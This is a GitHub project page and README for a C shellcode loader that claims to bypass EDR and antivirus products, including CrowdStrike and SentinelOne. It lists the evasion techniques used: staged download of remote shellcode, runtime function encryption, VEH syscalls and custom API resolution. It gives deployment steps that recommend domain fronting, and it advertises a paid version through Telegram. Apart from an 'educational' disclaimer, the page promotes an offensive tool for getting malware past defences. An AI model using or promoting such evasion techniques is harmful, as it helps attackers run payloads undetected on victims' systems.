https://github.com/evilbytecode/edr-xdr-av-bypass-shellcode-loader
Bypassing Major EDR's with staged shellcode, custom getmodulehandleW and getprocaddress, veh syscalls & more.
https://github.com/evilbytecode/edr-xdr-av-bypass-shellcode-loader
Last synced: 2 months ago
JSON representation
Bypassing Major EDR's with staged shellcode, custom getmodulehandleW and getprocaddress, veh syscalls & more.
- Host: GitHub
- URL: https://github.com/evilbytecode/edr-xdr-av-bypass-shellcode-loader
- Owner: EvilBytecode
- Created: 2024-12-15T18:10:57.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-02-07T17:44:33.000Z (3 months ago)
- Last Synced: 2025-02-07T18:33:31.601Z (3 months ago)
- Language: C
- Size: 17.6 KB
- Stars: 9
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# EDR-XDR-AV-Bypass-Shellcode-Loader
- CURRENTLY BYPASSES CROWDSTRIKE & SENTINEL ONE RUNTIME.
- SCROLL DOWN TO FIND DETECTIONS (RUNTIME & STATIC TIME ANALYSIS)
---
- Want paid version? contact me at : https://t.me/codepulze
-![]()
- [Join our Discord server!](https://discord.gg/NRTdwYUtdQ)---
## Overview
This project provides an advanced shellcode loader capable of bypassing major EDRs (Endpoint Detection and Response), XDRs, and AV (Antivirus) systems. The shellcode is executed in a staged manner with techniques such as memory protection manipulation, VEH (Vectored Exception Handling), and system calls to evade detection.## Features
- **Staged Shellcode Execution**: Downloads and executes shellcode in multiple steps to minimize detection.
- **Custom Memory Protection**: Evading modern AntiVirus memory scanners by encrypting a function during runtime, then decrypting it when the function needs to be executed, then re-encrypting the function once the function has finished executing
- **Vectored Exception Handling (VEH)**: Handles memory access violations and redirects execution flow.
- **Encrypted Shellcode**: Shellcode is encrypted during download and decrypted in-memory before execution.
- Custom ```GetProcessAddress``` & ```GetModuleHandleW```
## Prerequisites
- Windows Operating System (x64)
- Visual Studio or compatible C++ compiler
- Internet connection (for staged shellcode download)## Usage
### Build
1. Clone the repository:
2. Open the project in Visual Studio or your preferred C++ environment (i use vsc).
3. Compile the project in Release mode for a production-ready executable.### Execution
1. Host the shellcode binary on a remote server (e.g., Discord, AWS, or any public URL, works best with domain fronting).
2. Update the shellcode URL in the `main` function:
```cpp
std::wstring url = L"https://your-hosted-url/shellcode.bin";
```
3. Run the executable:
```bash
hack.exe
```## DETECTIONS (scanner.to / kleenscan)


## Disclaimer
This tool is intended for educational and research purposes only. Misuse of this tool for malicious purposes is strictly prohibited and against the law. The author does not condone or support any illegal activity.# Refernces that might help you:
- https://redops.at/en/blog/syscalls-via-vectored-exception-handling#:~:text=What%20is%20meant%20by%20syscalls%20via%20vectored%20exception,a%20VEH%20function%20and%20deliberately%20throwing%20an%20exception.
- https://whiteknightlabs.com/2024/07/31/layeredsyscall-abusing-veh-to-bypass-edrs/
- https://github.com/C5Hackr/Segment-Encryption
- https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/